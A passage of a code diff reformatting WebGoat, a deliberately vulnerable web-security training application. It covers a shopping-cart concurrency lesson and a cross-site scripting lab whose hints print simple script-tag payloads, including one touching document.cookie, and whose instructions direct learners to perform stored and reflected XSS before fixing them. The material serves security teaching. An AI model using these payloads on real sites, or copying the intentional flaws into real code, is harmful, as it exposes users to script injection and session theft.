+			// Table Setup
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
+			tr.addElement(new TH().addElement("Price").setWidth("10%"));
+			tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+			tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
+			table.addElement(tr);
+
+			// Item 1
+			tr = new TR(); // Create a new table object
+			tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
+			tr.addElement(new TD().addElement("$169.00").setAlign("right"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY1", String.valueOf(quantity1)))
+					.setAlign("right"));
+
+			total = quantity1 * 169;
+			subTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr); // Adds table to the HTML
+
+			// Item 2
+			tr = new TR();
+			tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
+			tr.addElement(new TD().addElement("$299.00").setAlign("right"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY2", String.valueOf(quantity2)))
+					.setAlign("right"));
+
+			total = quantity2 * 299;
+			subTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
+
+			// Item 3
+			tr = new TR();
+			tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
+			tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY3", String.valueOf(quantity3)))
+					.setAlign("right"));
+
+			total = quantity3 * 1799;
+			subTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
+
+			// Item 4
+			tr = new TR();
+			tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
+			tr.addElement(new TD().addElement("$649.00").setAlign("right"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY4", String.valueOf(quantity4)))
+					.setAlign("right"));
+
+			total = quantity4 * 649;
+			subTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
+
+			ec.addElement(table);
+
+			table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				table.setBorder(1);
+			}
+
+			ec.addElement(new BR());
+
+			// Purchasing Amount
+			tr = new TR();
+			tr.addElement(new TD().addElement("Total: " + "$" + formatInt(subTOTAL) + ".00").setAlign("left"));
+			table.addElement(tr);
+
+			// Update Button
+			Element b = ECSFactory.makeButton("Update Cart");
+			tr = new TR();
+			tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
+			table.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+			table.addElement(tr);
+
+			// Purchase Button
+			Element c = ECSFactory.makeButton("Purchase");
+			tr = new TR();
+			tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right"));
+			table.addElement(tr);
+
+			ec.addElement(table);
+			ec.addElement(new BR());
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return (ec);
+	}
+
+	String formatInt(int i)
+	{
+		NumberFormat intFormat = NumberFormat.getIntegerInstance(Locale.US);
+		return intFormat.format(i);
+	}
+
+	String formatFloat(float f)
+	{
+		NumberFormat floatFormat = NumberFormat.getNumberInstance(Locale.US);
+		floatFormat.setMinimumFractionDigits(2);
+		floatFormat.setMaximumFractionDigits(2);
+		return floatFormat.format(f);
+	}
+
+	int thinkPositive(int i)
+	{
+		if (i < 0)
+			return 0;
+		else
+			return i;
+	}
+
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.CONCURRENCY;
+	}
+
+	/**
+	 * Gets the hints attribute of the AccessControlScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Can you purchase the merchandise in your shopping cart for a lower price?");
+		hints.add("Try using a new browser window to get a lower price.");
+		hints.add("In window A, purchase a low cost item, in window B a high cost item.");
+		hints.add("In window A, commit after updating cart in window B.");
+
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the WeakAccessControl object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.";
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(120);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "Shopping Cart Concurrency Flaw";
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java
index c848a8b91..60dac506d 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons.CrossSiteScripting;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.ElementContainer;
 import org.owasp.webgoat.lessons.Category;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
@@ -19,287 +19,266 @@ import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
 
+
 /**
- /*******************************************************************************
+ * /*******************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  */
 public class CrossSiteScripting extends GoatHillsFinancial
 {
-    private final static Integer DEFAULT_RANKING = new Integer(100);
+	private final static Integer DEFAULT_RANKING = new Integer(100);
 
-    public final static String STAGE1 = "Stored XSS";
-    
-    public final static String STAGE2 = "Block Stored XSS using Input Validation";
-    
-    public final static String STAGE3 = "Stored XSS Revisited";
-    
-    public final static String STAGE4 = "Block Stored XSS using Output Encoding";
-    
-    public final static String STAGE5 = "Reflected XSS";
-    
-    public final static String STAGE6 = "Block Reflected XSS";
-    
-    protected void registerActions(String className)
-    {
-	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+	public final static String STAGE1 = "Stored XSS";
 
-	// These actions are special in that they chain to other actions.
-	registerAction(new Login(this, className, LOGIN_ACTION,
-		getAction(LISTSTAFF_ACTION)));
-	registerAction(new Logout(this, className, LOGOUT_ACTION,
-		getAction(LOGIN_ACTION)));
-	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
-		getAction(VIEWPROFILE_ACTION)));
-	registerAction(new UpdateProfile(this, className,
-		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-	registerAction(new DeleteProfile(this, className,
-		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
+	public final static String STAGE2 = "Block Stored XSS using Input Validation";
 
-    /**
-     *  Gets the category attribute of the CrossSiteScripting object
-     *
-     * @return    The category value
-     */
-    public Category getDefaultCategory()
-    {
-	return Category.XSS;
-    }
+	public final static String STAGE3 = "Stored XSS Revisited";
 
-    /**
-     *  Gets the hints attribute of the DirectoryScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
+	public final static String STAGE4 = "Block Stored XSS using Output Encoding";
 
-	// Stage 1
-	hints.add("You can put HTML tags in form input fields.");
-	hints
-		.add("Bury a SCRIPT tag in the field to attack anyone who reads it.");
-	hints
-		.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in message fields.");
-	hints
-		.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in message fields.");
+	public final static String STAGE5 = "Reflected XSS";
 
-	// Stage 2
-	hints
-		.add("Many scripts rely on the use of special characters such as: &lt;");
-	hints
-		.add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering).");
-	hints
-		.add("The java.util.regex package is useful for filtering string values.");
+	public final static String STAGE6 = "Block Reflected XSS";
 
-	// Stage 3
-	hints
-		.add("Browsers recognize and decode HTML entity encoded content after parsing and interpretting HTML tags.");
-	hints
-		.add("An HTML entity encoder is provided in the ParameterParser class.");
-
-	// Stage 4
-	hints
-		.add("Examine content served in response to form submissions looking for data taken from the form.");
-
-	// Stage 5
-	hints
-		.add("Validate early.  Consider: out.println(\"Order for \" + request.getParameter(\"product\") + \" being processed...\");");
-
-	return hints;
-    }
-
-
-    /**
-     *  Gets the instructions attribute of the ParameterInjection object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "";
-
-	if (!getLessonTracker(s).getCompleted())
+	protected void registerActions(String className)
 	{
-		String stage = getStage(s);
-		if (STAGE1.equals(stage))
-	    {
-		    instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br>"
-			    + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
-			    + "Verify that 'Jerry' is affected by the attack.";
-	    }
-		else if (STAGE2.equals(stage))
-		{
-		    instructions = "Stage 2: Block Stored XSS using Input Validation.<br>"
-			    + "Implement a fix to block the stored XSS before it can be written to the database. "
-			    + "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
-		}
-		else if (STAGE3.equals(stage))
-		{
-		    instructions = "Stage 3: Execute a previously Stored Cross Site Scripting (XSS) attack.<br>"
-			    + "The 'Bruce' employee profile is pre-loaded with a stored XSS attack. "
-			    + "Verify that 'David' is affected by the attack even though the fix from stage 2 is in place.";
-		}
-		else if (STAGE4.equals(stage))
-		{
-		    instructions = "Stage 4: Block Stored XSS using Output Encoding.<br>"
-			    + "Implement a fix to block XSS after it is read from the database. "
-			    + "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack.";
-		}
-		else if (STAGE5.equals(stage))
-		{
-		    instructions = "Stage 5: Execute a Reflected XSS attack.<br>"
-			    + "Use a vulnerability on the Search Staff page to craft a URL containing a reflected XSS attack.  "
-			    + "Verify that another employee using the link is affected by the attack.";
-		}
-		else if (STAGE6.equals(stage))
-		{
-		    instructions = "Stage 6: Block Reflected XSS using Input Validation.<br>"
-			    + "Implement a fix to block this reflected XSS attack. "
-			    + "Repeat step 5.  Verify that the attack URL is no longer effective.";
-	    }
+		registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+		registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+		registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+		// These actions are special in that they chain to other actions.
+		registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
+		registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
+		registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
 	}
 
-	return instructions;
-
-    }
-
-    @Override
-	public String[] getStages() {
-    	if (getWebgoatContext().isCodingExercises())
-    		return new String[] {STAGE1, STAGE2, STAGE3, STAGE4, STAGE5, STAGE6};
-    	return new String[] {STAGE1, STAGE3, STAGE5};
-	}
-
-    public void handleRequest(WebSession s)
-    {
-	if (s.getLessonSession(this) == null)
-	    s.openLessonSession(this);
-
-	String requestedActionName = null;
-	try
+	/**
+	 * Gets the category attribute of the CrossSiteScripting object
+	 * 
+	 * @return The category value
+	 */
+	public Category getDefaultCategory()
 	{
-	    requestedActionName = s.getParser().getStringParameter("action");
+		return Category.XSS;
 	}
-	catch (ParameterNotFoundException pnfe)
+
+	/**
+	 * Gets the hints attribute of the DirectoryScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
 	{
-	    // Let them eat login page.
-	    requestedActionName = LOGIN_ACTION;
+		List<String> hints = new ArrayList<String>();
+
+		// Stage 1
+		hints.add("You can put HTML tags in form input fields.");
+		hints.add("Bury a SCRIPT tag in the field to attack anyone who reads it.");
+		hints
+				.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in message fields.");
+		hints.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in message fields.");
+
+		// Stage 2
+		hints.add("Many scripts rely on the use of special characters such as: &lt;");
+		hints
+				.add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering).");
+		hints.add("The java.util.regex package is useful for filtering string values.");
+
+		// Stage 3
+		hints
+				.add("Browsers recognize and decode HTML entity encoded content after parsing and interpretting HTML tags.");
+		hints.add("An HTML entity encoder is provided in the ParameterParser class.");
+
+		// Stage 4
+		hints.add("Examine content served in response to form submissions looking for data taken from the form.");
+
+		// Stage 5
+		hints
+				.add("Validate early.  Consider: out.println(\"Order for \" + request.getParameter(\"product\") + \" being processed...\");");
+
+		return hints;
 	}
 
-	if (requestedActionName != null)
+	/**
+	 * Gets the instructions attribute of the ParameterInjection object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
 	{
-	    try
-	    {
-		LessonAction action = getAction(requestedActionName);
+		String instructions = "";
 
-		if (action != null)
+		if (!getLessonTracker(s).getCompleted())
 		{
-		    if (!action.requiresAuthentication()
-			    || action.isAuthenticated(s))
-		    {
-			action.handleRequest(s);
-			//setCurrentAction(s, action.getNextPage(s));
-		    }
+			String stage = getStage(s);
+			if (STAGE1.equals(stage))
+			{
+				instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br>"
+						+ "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
+						+ "Verify that 'Jerry' is affected by the attack.";
+			}
+			else if (STAGE2.equals(stage))
+			{
+				instructions = "Stage 2: Block Stored XSS using Input Validation.<br>"
+						+ "Implement a fix to block the stored XSS before it can be written to the database. "
+						+ "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
+			}
+			else if (STAGE3.equals(stage))
+			{
+				instructions = "Stage 3: Execute a previously Stored Cross Site Scripting (XSS) attack.<br>"
+						+ "The 'Bruce' employee profile is pre-loaded with a stored XSS attack. "
+						+ "Verify that 'David' is affected by the attack even though the fix from stage 2 is in place.";
+			}
+			else if (STAGE4.equals(stage))
+			{
+				instructions = "Stage 4: Block Stored XSS using Output Encoding.<br>"
+						+ "Implement a fix to block XSS after it is read from the database. "
+						+ "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack.";
+			}
+			else if (STAGE5.equals(stage))
+			{
+				instructions = "Stage 5: Execute a Reflected XSS attack.<br>"
+						+ "Use a vulnerability on the Search Staff page to craft a URL containing a reflected XSS attack.  "
+						+ "Verify that another employee using the link is affected by the attack.";
+			}
+			else if (STAGE6.equals(stage))
+			{
+				instructions = "Stage 6: Block Reflected XSS using Input Validation.<br>"
+						+ "Implement a fix to block this reflected XSS attack. "
+						+ "Repeat step 5.  Verify that the attack URL is no longer effective.";
+			}
 		}
-		else
-		{
-		    setCurrentAction(s, ERROR_ACTION);
-		}
-	    }
-	    catch (ParameterNotFoundException pnfe)
-	    {
-		System.out.println("Missing parameter");
-		pnfe.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (ValidationException ve)
-	    {
-		System.out.println("Validation failed");
-		ve.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (UnauthenticatedException ue)
-	    {
-		s.setMessage("Login failed");
-		System.out.println("Authentication failure");
-		ue.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		s.setMessage("You are not authorized to perform this function");
-		System.out.println("Authorization failure");
-		ue2.printStackTrace();
-	    }
-	    catch (Exception e)
-	    {
-		// All other errors send the user to the generic error page
-		System.out.println("handleRequest() error");
-		e.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
+
+		return instructions;
+
 	}
 
-	// All this does for this lesson is ensure that a non-null content exists.
-	setContent(new ElementContainer());
-    }
+	@Override
+	public String[] getStages()
+	{
+		if (getWebgoatContext().isCodingExercises())
+			return new String[] { STAGE1, STAGE2, STAGE3, STAGE4, STAGE5, STAGE6 };
+		return new String[] { STAGE1, STAGE3, STAGE5 };
+	}
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+	public void handleRequest(WebSession s)
+	{
+		if (s.getLessonSession(this) == null) s.openLessonSession(this);
 
+		String requestedActionName = null;
+		try
+		{
+			requestedActionName = s.getParser().getStringParameter("action");
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// Let them eat login page.
+			requestedActionName = LOGIN_ACTION;
+		}
 
-    /**
-     *  Gets the title attribute of the CrossSiteScripting object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return "LAB: Cross Site Scripting";
-    }
+		if (requestedActionName != null)
+		{
+			try
+			{
+				LessonAction action = getAction(requestedActionName);
+
+				if (action != null)
+				{
+					if (!action.requiresAuthentication() || action.isAuthenticated(s))
+					{
+						action.handleRequest(s);
+						// setCurrentAction(s, action.getNextPage(s));
+					}
+				}
+				else
+				{
+					setCurrentAction(s, ERROR_ACTION);
+				}
+			} catch (ParameterNotFoundException pnfe)
+			{
+				System.out.println("Missing parameter");
+				pnfe.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (ValidationException ve)
+			{
+				System.out.println("Validation failed");
+				ve.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (UnauthenticatedException ue)
+			{
+				s.setMessage("Login failed");
+				System.out.println("Authentication failure");
+				ue.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				s.setMessage("You are not authorized to perform this function");
+				System.out.println("Authorization failure");
+				ue2.printStackTrace();
+			} catch (Exception e)
+			{
+				// All other errors send the user to the generic error page
+				System.out.println("handleRequest() error");
+				e.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			}
+		}
+
+		// All this does for this lesson is ensure that a non-null content exists.
+		setContent(new ElementContainer());
+	}
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the CrossSiteScripting object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "LAB: Cross Site Scripting";
+	}
 
 	public String htmlEncode(WebSession s, String text)
 	{
-		if (STAGE4.equals(getStage(s)) && 
-				text.indexOf("<script>") > -1 && text.indexOf("alert") > -1 && text.indexOf("</script>") > -1)
+		if (STAGE4.equals(getStage(s)) && text.indexOf("<script>") > -1 && text.indexOf("alert") > -1
+				&& text.indexOf("</script>") > -1)
 		{
 			setStageComplete(s, STAGE4);
-			s.setMessage( "Welcome to stage 5 -- exploiting the data layer" );
+			s.setMessage("Welcome to stage 5 -- exploiting the data layer");
 		}
-		
+
 		return HtmlEncoder.encode(text);
 	}
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java
index 605fa82dc..4224c606e 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.CrossSiteScripting;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.session.Employee;
@@ -12,184 +12,150 @@ import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class EditProfile extends DefaultLessonAction
 {
 
-    public EditProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	if (isAuthenticated(s))
+	public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    int userId = getUserId(s);
-	    int employeeId = s.getParser().getIntParameter(
-		    CrossSiteScripting.EMPLOYEE_ID);
-
-	    Employee employee = getEmployeeProfile(s, userId, employeeId);
-	    setSessionAttribute(s, getLessonName() + "."
-		    + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-
-    public String getNextPage(WebSession s)
-    {
-	return CrossSiteScripting.EDITPROFILE_ACTION;
-    }
-
-
-    public Employee getEmployeeProfile(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException
 	{
-	    String query = "SELECT * FROM employee WHERE userid = ?";
+		getLesson().setCurrentAction(s, getActionName());
 
-	    try
-	    {
-		PreparedStatement answer_statement = WebSession
-			.getConnection(s).prepareStatement(query,
-				ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		answer_statement.setInt(1, subjectUserId);
-		ResultSet answer_results = answer_statement.executeQuery();
-		if (answer_results.next())
+		if (isAuthenticated(s))
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			int userId = getUserId(s);
+			int employeeId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID);
+
+			Employee employee = getEmployeeProfile(s, userId, employeeId);
+			setSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		}
+		else
+			throw new UnauthenticatedException();
 	}
 
-	return profile;
-    }
-
-
-    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public String getNextPage(WebSession s)
 	{
-	    String query = "SELECT * FROM employee WHERE userid = ?";
+		return CrossSiteScripting.EDITPROFILE_ACTION;
+	}
 
-	    try
-	    {
-		PreparedStatement answer_statement = WebSession
-			.getConnection(s).prepareStatement(query,
-				ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		answer_statement.setInt(1, subjectUserId);
-		ResultSet answer_results = answer_statement.executeQuery();
-		if (answer_results.next())
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			String query = "SELECT * FROM employee WHERE userid = ?";
+
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s)
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				answer_statement.setInt(1, subjectUserId);
+				ResultSet answer_results = answer_statement.executeQuery();
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
